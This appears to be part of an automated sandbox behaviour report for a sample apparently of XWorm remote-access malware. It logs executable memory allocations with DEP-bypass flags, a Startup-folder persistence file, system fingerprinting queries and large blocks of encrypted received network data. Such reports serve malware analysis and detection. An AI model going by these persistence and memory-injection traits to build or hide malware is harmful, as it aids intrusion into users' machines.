protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04942000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04943000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1492
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05e81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00780000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00790000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02204000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 147456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02204000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02224000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02224000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 32768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 81920
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00180000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02910000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02e30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9934761984
free_bytes_available: 9934761984
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Archevod_XWorm.exe
wmi Select * from Win32_ComputerSystem
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received  ˜z„Ø~ ¶¼öâûÈå…?ZSA~åE—ˆSdÍ £$çà ê4FÝõÈý31Ç5R#íÚp¬ÀuœF^Ê¢Mú—+MúVª#ß*Uð™œ×c­¿kU#õá|®­_¯l+Ka’H^'Å,¢å0&?ö äð´S40Jy|5܊jÓcmžö“ëK÷²»œlÇïÍ:ÿǹU*Ý+lI2XÆÏ ¯»Xý—©púéÒ=ãé«Mò<­ƒRðÜ_5Eù° n í‰gqfg9M]]Üwe“ÄÁrYå&¢ ðæë?Ð{Ô$q¨OP1[v©3TZ+‘•þÀKNì°3®ñ÷ÞD»!¿XŒÿ’ÝÜ°ë1# @ã¡ÙŠ†?w;?^“¦S9/¹ùç…ê«„÷vÝ‘ÌÝ>K/zK:²Ó§+ååBý£À ñwξ‡-dÄô!7 tpÆmud´™GC—aìSð­t«§d¸Õ¶Q÷³\±~ÿ÷CcZdóø ÍÆl²Á´gdNG÷d@Ê^kŸÄÙÒÏÕ»+‰ š>iz}ÀxZZæsSƒß/l'‘áò”FîcÀ~ØÄ©žw@ú¦êƛj±Ø¨¬Z$°&.OÀkßá}Ҏl`+·|ë³)Âñ7-垏ÚrR;)…Ÿq›J¾¹žX°YaÒß! ¹H̟%ۍڻÊ)jûÿà“>^1úr —ÚAÐJV3VÎ–`ÞÄççƒvnŠô4"o¹;_·$A¯¯N¢Óˆx“pLì•q8iú ºâE׆† |Õü¾Ôʅkìo 4ÂûVØÛ¨jå'"îÈǖ"—·H‘Êà¶ØµÊ¶¦è?½íÜq~–(íX{CÓҎŸ‰ÎðC)uDÄæª%ª‹€äÅðs1Û}$ËxˆpI*Ìà#¦ƒƒN=˔mýªz|ïѾÀ{‡*š®t„jKõ?Ù3kFj¯¥GÒñNOø…;VÈÇñØbÑ1ýëXe|Êõ{ƒ(œ¯¸ ÿ¶‘¶‹Ç…*Ü/š5Kª;ˆ›ÞΑO–Å+WD¿¡ŒŠŽÓái1¼¦ÜÓfæÈÐásÙÔ»p¥Øo:æmŸÁ½84¸GôÄIjµ¿‰BÝ\u¶f\ œãOPjýÞë±+ØÁÿº\’•áÑ`¡¤~_÷L3â‡k[M˯I¯!IÃ[å>S¼»Ø8ÊÖSø`BJ¢Š•’Z½êè˙Í$}±Ûv]B£tˆ­ÖE fÙ®ï]¤úøÇ*wÆ‚® ¤|íÀ¨Dæ·iüüÞ¬3`V`ý¾'œx8" 9ü°¥ë?œ/¨›*û/A Àû¦ÔËNPÆzÓßQ˜‚¤æÒ>PÉÁàQ[:ǙªøyôWà?,„!·l#º­a¦Ü[£[.øÞ¦Œ(º(µ #s9wýH‡S™jvÌ8[¨¹$t;mÀÿ|$ë·AF¬Ñ.Is™&?yl҉S=QŠ"gÇKÒu[œ*a¾¶¼DdD4€ õVÿÒÛ!ŸÔu mãMeŸ¶1hMcÞwv*ê·Kå!að}Y:7).‚Œ³%O×$ʳ†ÍUqtÚƹ•RÌn€¼,þ½ºÝ® a³«H*±CÌfË·fÅmÐHžË|ܟîs¯ ùž I£™›æc¨ø¥#CxƁ}K÷´ OˆՅ ªŒû¥‚áÅþ¼›² ŸmtyÛk¹:÷Ûþ5Äûs¥Í@D@9Ÿ8SHÍmãÖ?‚u¿—¹ýH½Û…'IsPÏ/¶ßŌa¦Q#NêC‚¡6ö“|ºÆÞôÌlü FJ÷8mTzm˜žÅ›—hÅ[+·óõmàcªRA<lÛr'èú_PöSüéÈ^Ôþ0O- óâÝêšñLNڏx¢nï-}€Mü ÂšS#ûð˜?ݱ–ì2I²á·²MH¡Ù}4ïÁà4z åt_W§Ûq,™ ú¿Š1­¥²B͗ø½…3•Dcx 4f¤ Ýüƒå䇖7·I:¡í"+¡€æ µ· ¸ït*CÀ/AC¿/Âx ûZw~ˆå<¯!£fpSVÝ^„+3Ë5¥äγ;¤}2nß.þÄcôO‹×K'Ù®ófµNí©¦‰”»‚T¿‚þ‚˜pú8Ààæo ŽL¶pÓÂÑÛÿӏ4Ԗ­b,ÐùÔGä°1õÔ;B±FAd€ËñÁ£´”3@™ï»HrrF¿`"G Ý>ˆt¾<‚¨NÞ"ß7(@¥h[8Ý$÷9ΓÊ\÷¦záÇIÕ¬«;Sd"x c>ÿ+A-¥Ç›ÖˆÄhÄ{ Ï{aûƒˆaßtå-å0Œ“vÈO Oímñv$ŒBÈ(akÇßDñ@NaÞ«…“D²­½lÓé±grþÊ |‹¸ÕyŽŽ¶v¡A¶(?ý͟"hCãë3féZE §Í¨PÝoCuááøØÒþhQŽ» âC‰Ãðµ÷<çÜÉ}‹oʀ"tèGɪÏfÜ=wHá0Õî9 À@3ë(À0æ³I„GîÂîÇhgÃJQ]ò@…Ð/ßJÁ„[êÚ¤¼ÆÍ!?4k±vl\»3%ŒÏºøƒ)ÂÞ½ƒ“o}!ü,°KËJ9x€”ºè`F$k鉼ÇÚùÓF~„v•HŽ’³µ¼%N[,ãûÖ¿ ¸,d9²qÃ-¯-%s–bEX½æôþϺ3ýå>g îTJÞàé÷±èîýr:’©7 üä³íº|²Ø{N褀›h”¼,Ô¬°”žˆZél‡K«Œ¶ÒGx7R\¢tÙ¹n>laª"®Ë¶¨5×Ü»W¥*o³ØÖ§¨„*âI1v€#úLΗN‰¬j]HžRsŸßo·*e %õ6NŠ»§x·OȕåxIâPU/⻪p_ l£ä¥ÓhP5´uA·…ÿdž>¤¨ ø—öԍ?IðM"9EHæOƒ½ ‹\2õ2Q>Ã@6ï¯kä„kêÛS äùû…ß¹NÝvÝPeèmٖe\¶¥-H‘X,3)˜>Ò¹ð{¥e.?uSdQ³ñ: È‚¼ØH`SŽ%ƒö¡›¬^qmfÛ97ѕ0×8Ž?4éËÔRZ#ÊòCò<WèSîÊPæ£ÎFíj·.…_ŒèÆtî¥/ãÅlóA¦üÅ ÏYmžï"øn¿Ô°&}NÍܾµçÊ¥UrâÔmš«@:}²²Õ¶ÕW5ž÷ûÛ" ŸÕ‹°9[s˜qdž±Ùá%gDX¼æ_}9q„í*¬´?Zˆ“bъlÖ©/$d¢½yr†]ª9ü ěãJI?åۆù]ÇûÕá†L©@‘@aSáȧ•W]ËX°/“#œ¼ªaOÚËx£ˆÀü޴רÀÌ*…ñØ2|÷|xn²Øé°3šZ+“X+N®c¶Íúx–õj¢/c,õ*¸:ÎÙ9òƒ`;VüÛ¿œFZ&Ye'¡t‹^pc•»ƒ—þÀ6®Ã¦¡O¡èïZžaWÖñ;¨æ•¾¶.è¶NH Œñá¢yŽKŽß3ç]¹0¬FUNõ$'I£É#?•UD<,`°@-‹¼”™”‡zß%©åažã¸±o Zԑÿ!m¶-^+8dß ÒË:”£•ÅZÈÖ,²Êхú Z…!{5QDÎÚÀK‘€ð*© 9˳f`ލGûAòjå«xÞo||PQ8½«Ëâóþ0ŽêbÛVoF¿ äÞ3Ô<ôMd„Fn…( l}R1{ø}ƒéèK¯ÿõ‹2¢,¾vtí­3áÅA¿Êu액?°(±\žÖþÌü‹Í‘„*,͵ó ²¼´J §;P¾@Mˆcé„؝ކ-õCœhHö›±ô…ãzfÛ£w,f£(.ÍUNïØO de8åð¥Ãų˜s‹éd€™ÊÿðØhyf6cnÐÝèÞ²d ,^Œ°“8Îßu&uÁÚª­)n¢5Ë Óþ2å–cÕ_;åqLj/ÒznºÔ©6¯Øú/H=@»Â.—ÛÀ~ãúRíâAñÈÅã{[}.~¿ä/BKTk ¡¸ðՓ@Ð9t /›#­±š+k_cý§5R-¾â3Õ¥òÈdð0[&}ï@u‡êDü;üŹ­ôç®dRºéyÙOcuiÁîGö}Γ|$b°( .tú&ùèâ¥) Y™)¶dÕë'e¬»å0Ó¿BJÒnMyÍÁ‚קŠ/æ‡ÅÄxÚyé  {™Dô7ö$ßVŸhj]›ýÈe«<ý~¤`³½&‚aª¨/øt¡³ÿáŽQé]jº_÷Þ,€–ÖÇò ©Jèã=Èi¼XÍR“,E®ÜL͘'–´vøÌÕ<1êȵv 7ä³dþ=ÄÐô0Oü~âe–êՐS¸GNh:HJãW€d†oÄxq*=Vm“ètur?ߘ¥­îÔu÷3åÖ#ñ
Data received T¿Ï†åOÉ©ŽRƒ aG“q:nÒÅ`ŠFØOz4 >p„=Â\LÏ’IM»“FÝ}³^ð0²,a.³´§Î MÙÅ{ví;8yàÛWù>BT$ÕÕxJÀM²'bëĒäþ¡BøE­å›÷‚åÖQsuG™Æ1y0- ž×«“Âäfö·<(¹ƒ&fʍt>Ù åð¬l3j«j‹ÞË Œ°0·öî1®…N†zSÁZ‘UzÆÖ}°Ù»ý ."£’¡ìU¤Äß··E´!0x#¿ Úôç”p—XðýHª­Ó·ØúñÃC˜Ê5®g4GúÇx'UÜ2 .nÕB¶Náÿ³òš“Rbβ¼›£Zí ÌÕp™Ò7›¾›ã_:cÿ×d–ÇÕ¯¿M!Hp9a[ˆM(BqŒÔ;¶º"—¤Y©ÍRóŽ&Œør ß ÄåaOÂBÒÊá^ˆ>b·é–#L I©¤x£¡~WM£@Â}AógÑÍn¿ŸÀж TÿèÖ~CŒ}¡¦Õýÿ2{ô üûƒ(DUAçèX¹êk˜N+—DTãT6ýC/7Ÿ‹:°¢áÙ, ¹£EðɦL(¯¾á×vϯN£f>صIZ͖Zö=$<X—#GÑ]2/4ïsf\Í4'—ôXƒƒZÏŽñÇ|láIxM{F-¾ïw½ƒ¬@Åe°­PUW-¶ã˺¡ïn6±{ߍqÅýAú]odºðÁ­s!k] 7OɛÓË«Îûƒÿž—QS.µûÖ©Vûþh¬J—LX.,¶÷$–§è–ºqêNÝrK´àÎYa¢I` &ò©½J~sÁÐxjd€GÐ8²$õ¬Ll)¹,†}ª;(“ŽN©H*VN–|hhܵË0~#Ԑ&4$ãö:í oxu Q0;çkðu·ï$dšóáÞÁúˆaop»l9«×i.¾[*šºQ@»xãr@Á¬pÏ)ñØ/^TH€nٟuAmŽ‚3¨ Ë-¥Õ<áùxë-)ûP%çäM¯”i+8Q»ÿ㯢i=¼„}ý3–½mX X¨çÌP¶+²Jä_–öX`ôŽažû#H'bý@=j“UŸ_5àñB7¨{Fºp©;#ˆÞPÃVt¾`-VÈ[•v6¤ß<¤V¥#æ?&É°äòy9O܅xŒÃ:M7²£½2‰íuÃ.¶¤~Òj}á ðÈXDXe¼ÓLÓp}³òŽÆ¡šÙ 7÷Ð3EÖ1ä­H!É.I"ÓhmlÖÑZÁŸ§·í‡Â)©9×9þ€ÜUõ«<P¥å“àE)@¼ír·d±ŠnÏÿJŒT“Îëέcá{õ'ÝÿöȆ]'‚~ë d›õš³÷åÓëêÐÍickà0§l[°+€™Å5ëa·¦C>'‚ÁÞÞnS0ø€‡Óµg°R…z{P›ââ?SßnÔß¾#ü¸Œiá-î7nSâ07z-šw' â.\‹Ñör©×%¾šd¼-xý06oꙄ2¸LLÿåºåÇù¥·‘ p ãõ“;ÂÑߥ]On/å䏌AjÎތ- fz{R½nIÕÛ%)ù}ªXÅRÈƤ)kyrWzSwYo“j”êýÄÖcïة꩕s5ržulû8z¥c“$>Ûæ`Xë_–¥óV­Ô€<"·z½f@+ùæà©°N>L¶™Pòèø"«YžàñYè!Š„vÒgnÁø×U™–5Š‡pý5H˜qm°BÀú¶ûå¨UyªÎ.¬áöWôM˜!\Ð|£Žn£/d‹µ}–6úÅë›í0f‚®Š9JL“§Xâñ®‰u÷wƒ!ù CV¼• Ë¿N0„û;†Ûæ°ÿ%w¦fÀŊ°€Nðj²/;Gô‡|I,2n«³¼ (]·¸¦øwxkérowÁ‘ˆ‹'òú 59h(´Mcí©³Žf¡·CcØKSJœ™\áX2¶'Èª÷Ÿb¸pN)>xô¾2ÁÓâdxi‡ÆÄ^Ìå5!U¢Ô›Ê"‹l(ŸÙ „M™ÖC‰²r™î¨ÆºÆ’kÉ«°8Rž–þ>ÇU´Ezî+¦1žì”9;EW˜/“\À‰u öǨ¾§'!Ùü¥0ºnáJoÌ÷é0.xÀâUEt¶¤!.•\ÛЮ3IoøތVéè›}BL.8¾sòì=Ï&!3f ²%C¢-e:dKK&ÁcO`q›,:1×·Wޚ0“øøxû$d¹K;âÅ×a±æUU6BV ¹ÝõvهŸšê\Xöó­ôò»3[óR‹¶ƒ òwy“ôʒxºž ƒ“`Q?déÖZóԉxâBéœ3¬CâŠç#ZIGåóéðXCW Ìx®Ûh)‘ýÆ[Ç,¯nõ'êË©«"àù‘ƒÖ=ûÅ0H˜F¢«ߞyªYŸ<tË ´žú¿š&P´Ø2,äu¥Ý2=Wî¹á Í!҇DÚÉR8!{™A|"Pg¡É¨„¸“¤ÇK4dõÄÎïgÛâÎø-Ж”|Jù$äÔ~ßԾӋ_å̀Z¨iîa”"£ãs#7lÜ8Þ!‡e9òÛ⊈‹§ÙÂû°ÌÏ̀Üd÷DHöôéŽk3/·ÿqõ ßÝÈ+&YÚ¶…‚¨Æ›ùXQ¯¡¿ùTág¸)؝>Egj.ᜍɑ+жnPTp,-ô€ è u€€ö휋øt/ù@‘c¾"\;Ó>–è½þ’kŒ¤ä<Ånk[MÙċKs]Š&}>¶â„ C½3²æ4¯±¤Àx„è’Œz72Øüã2S—‹örœûWmuæ¼OÙ"1=Ðί t¡¤ÃƒG&åŽ"ì{õB8×9åÌ®LÈHo.þT~“wÃvô筄.øÃ9ãw û–BË6j ‚€¤/*À_N™ä U»n-H€ùî7æ˜-{>˟\£íÞ+ä¤ZY2°zÙx‡KÓõ±¬Å¢+²!§j{tµÏ…:·’)Ÿ‚3⵼ݽàr'ÓÇ|PNz8KgLb.x5(iâ'yúŸŠ]”ñ JÓ>ƒN}_sèNÞù˜ÝEô´„±¨ôÁq±ÅòÎú¹Þ 9I­±:%vR 0šðßAõê+2½ö<9ißäoÌ Ì^Êôð÷~ O]'!O™éB.˜¹hò°U©:¥2XÚp,±à* ór»ß*#¨kPÚó 1ð…p/¥é(ä»ëžÀ-?$ç“£ÍLøeB6Îäµà+|¡È°Ù'oÀ< "á.'J£·dx>o(Uþ€€q±£o£Cû"Ê7œh‹¡Š&Íš­JÀÜÎPS2Û^m#úu¥ªÄ'ä:sœ+tp$Ö$¹c[^÷³b¬jìڒ–¹(D®UuâKûŒ÷Ž#³¯²ãÊ9|Æ"üH *9{ˆzdL ¤iúBÚ¬·^Fˆjß.5x&ÚI2|,rzqÏQ%̋.dƶ©»ƒHõÒLɔI¾’"¹üÒv“0h(K›½b 85ËýæÃÁPè¬mÿS$w¢œúˆ> ÖåW0#³Ê=Êöæ¦)òž˜.vaéºèÏT2µwO—Y¥æà8Œ”ö²¸Œ¼¨M¯–Ü ³8MãUž°Î¶ä{'W€^Ãê&ƒXËü­¦4ïÞó8£Õ¾»»ƒWÎY[®¯íœÑr7–möœª…‡.«õÇ©’M÷<5$Ä^ öMU{›áÏÚ_û)ßÔ_sb„M1Ç:óW¿8.ÔÜ돸Íï¢î Äù´j5øߝôWĀL"Ý]àäóÝÍHêa¶¡¹\1Ä­ôU£Ÿû³nÓ6#Ò`jËt§ Çoäa¬Õˆr§¾1}<њ±]¨¶zêSi@¶öÖ“MÎ:oC÷nîÐC_ï>œ„ JRdž!­¤Ð`¸™\¿;«¦,hÎìH ˆ98nùàÝ{<›³Â÷Ë0`”¹j§²GWE¼ÍüõÙùøÝ·1}-­$âSù“ï&hâ/$:1 ESâÆLEMG˜*x¥³Äc»¬,DiaV–ñ(ñÞ0#2ò¨¾nàԁÄhrƒzþœà:Þa5pšw0Y¦²ðƒÿÊ {¼àyŸ­À¯Û὇ÖU¯yí¢…="þá bŸÓñïðs¼’Ê}HKío˜%|ZŠÆíùº§yñ3κ-r¥£Õ\åW2ìÌ•FH’r®Šw§Œv”¼\Ä:8üyJQüN ¦*’ÝhÆ<l98BÑ@· î÷\-ƒ32j T"U€»áŸÖTÃ&øP­jz2S!“ãÔ³âœgî…Á®:ø¹Î%37„c4«í8|¦Lª!ù…‡Ó‚Ƴ y=£8ºµA+Í~Eç̆jŒœYîÞ ÷:sME^õ“ƒ"ñùbt„tNuêèýLøñӐ†N9 ›”Å8,l>÷È[ÖN…·ÅücXV…¶ªî¾Ñb [X¾Ôo„“L&»¤qóýÝ;è-›>Uç-? ôn+0ÉÔì?هK}µŒµ•Š>S4IŠu ¸£¬¹øW§(l8ÈIÄ1gwˋù*ÿZX—IxPšÏÜË°; ¦d_;ÿ¤n;k+ôcY·Ì™Tù~«E%ü ‚åâú²£s¶ß°Bf&oùTVš’ät‰l©ó)ó³>ZՀt®mÆj_|%)D[XÆ'€=½äšd1bò2ÆÆ°°Ò‰z'Û¹ 9c‚Þð!4[Æ<[¾{ó¡Ei.œÎn…V1 «©’“oXXQ ÝæTXïö#.͐ë%öקÏX¾£`ÄYykîl-Þ>u íW´™f^E"ǸŠç°XŽH 2
Data received Š¬ç|•Ô'ÖèÉ©R‘¸Tþº`6T‘QLçŠH_ڄ€†T¨Ìîð׆¼ÈŽ Àç–ÜØÁ”9(Tnº vpôÊs˜ñÕ^‡ØÓ± ˆ®vi¨‘¬>ˆ´ “,šî*×B <Ô:‘LLŠDá Ð\TºT–ˆÀ)”º¤êôY­ ‘´çú܌Ì•¾Ô˜AÞÕKÜAÌں쁢¬Y刄ôÝҌAÕ¸”ðl‘öÔԂ‘,Ì`Â1¾h˜)pÞ/˜Á¡z‘ B çJܬVÔZPÙy òqÞ(|L2Štì‹ÄL\‹ÙQˆôIÒAA¸”¹â¤×ê¼¼ò¼úŠŒáÂЄTʺœÒÜY…ˆ¤ôýÒ¬I[óAÌ ºB¡£±Z Rö³¹õ÷“îÉؼöÁ¡ð‘¶ø ͋tß-—s—»aY0‰iòÌw«9àª}ãÔ¬¡âö“Aɸ‘W†쀑ÆLˆ‹i÷³-Ùt¾5˜l =À3«MÔºÙPÞ ]LŠUáЭT㺥£\ùÌÞ&jL,Šbá4ÐzT<ºrYSˆ ôKÒAC¸”»à¦×è¼¾ð ¶çø܎ŸΗ¾Ö˜ Þò‡Þ¦êL¬Šâá´ÐúT¼ºò„‚YӈŠôËÅz”Ø.ÌbÂ3¾j˜+ rò#ÞzL@ŠáHÐTPºX&Yˆ.ôwÒ6Ao¸>”gJ× ¼B ZçÜR»⳾ꘫ òò£ÞúŽLÀŠ†áÈОTк–Ø¦Yÿˆ®ô÷Ò¶A︾”ç„Ê׌¼Â” ÚçœÜÒ;ڐ*LlŠ"átÐ:T|º2DBYˆJô ÒRA¸Z”{ f×(¼~0 vç8ÜN_ÂW¾˜O òGÞæªL슢áôкTüº²ÄÂY“ˆÊô‹ÒÒAƒ¸Ú”û æר¼þ° öç¸ÜÎߎÂ׸·×Á±ÔÖܘTÙ;ƒbÌl "çtÜ:#z¾B˜ Jò ÞRLXŠná ÐfT(ˆ»À¸ÿ”¦Å‹×ͼƒ¾^Œ ÙC¸¶þ³¯Ù©·Y«±ºÌüŠ²áÄЊT̺‚ª‘Ñ)̙‹’÷»¦Ùÿ¾®˜÷ ¶òïÞ¾òL„ŠÊáŒÐÂT”ºÚœšY;|œ*l "çtÜ:#z¾B˜ JÀNžºWZä$‘jL,Šbá4ÐzT<ºrYSˆ ôKÒAC¸”»à¦×è¼¾ð ¶çø܎ŸΗ¼“!¡‘Ó‹e(ãû³¢ò̬Üâë²Â㾺˜Û ‚òÓފÞL(T˜ˆ.À¸b”3h>×p¼6x ç@ÜV¾^˜ &òÞ.bL4Šzá<ÐrTºJ YKˆôCÒA»¸â”³è¾×𼶍ø ŽçÀ܆—֏¾Þ˜‡ ¦òÿÞ®âL´Šúá¼ÐòT„ºÊŒŠYˈ’ôÃҚX;ž‰*çlÜ"+rÂ#¾z˜ BòÞJLPŠáXÐnT ºf(6Yoˆ>ôgÒA_¸”WZ×¼Rä ªçìÜ¢«ò£¾ú˜› Âò“ÞʞLЊ–áØÐîT ºæ¨¶Yôç҆A߸Ž”×”Úל¼Òd›Ø? nò7Þv:L|Š2áDÐ TLº廙”؃Å׈¼æ§ ÕºeÁcÐ%Thº=øs]ÉΉ1T“EòÞMLWŠá_ÐT'ºi/)Yhˆ1ô`ÚÆ/°µ̀¹^ ç‡_Ǻ½@˜S¸©Ø¥«ƒõÜßs’Œ]Á*ÍFZ/4`V±œ³£î•·ŽŸÃ\â!^.¶ê‚|é…ØÑàrîPø«JÕ2k•ÏaÖÁ!Ðf×ٚ­ÀÍÞz–55è}ET Ø÷p%¢Y8j”äÓY¬]„}ñ§ºÌǜŸv¬ˆ¶ÖFï*= ¼á²êÛÕ=ŽÒwrˤ¬««â¸ òe’šÌ-ÐÜp<ú\Ҋ3–†“ðÐp“DÖ ì©ÐTÕ°—‡™ðÕ‘˾;šgÞÑò¦ì‚æÈ=¢¸Y#ü{Ð.S¤£“•ä—ñ ûêÄH°iÍ+’vINÿ̃³Òò‰˜å¹XñÞð»5–Ž¯¾á™¬*tžžÛ‡¤Í¯(ƒNÑJØ{µÌ™’Uˆ~È2‘Ëpa§(š©³Ÿ£çµê¤Vt\ÖZd³Ô†âpLcxèÆ`ìð/{bÇ— /ÆѦDiOiÈ<’¯¹?)AƧŽ~Öªwý~žº†¨jÔÒø™®P»9ÌUœ<· Ú"À‡»E€P¶Ê´|Mù–Ô:yÐÐt溉\M›‰R`ÇÀTºôžÓÒ.öÉ&ýŠ·ˆœé‘¾ÕÜèÛþ²üÂb†yׂ» ¢§–×±òP9éœu7ޛúìœ&?Q.oká}ëm¾ŸAÀÄÄþjÁW¤—õîUæ·ïçØ»Ìb›wNåˆÅu•«^§]Í“¶æÄÒpCì¦ÕÇjȹh™8[@:¤ÃB·qN@ð¤U»§awr»‰õÔMƒ{¯Pӏ;x ¹ê Ë¥΍¾êÛìnób#QeF¿ɤ̈Ärº|c¹ 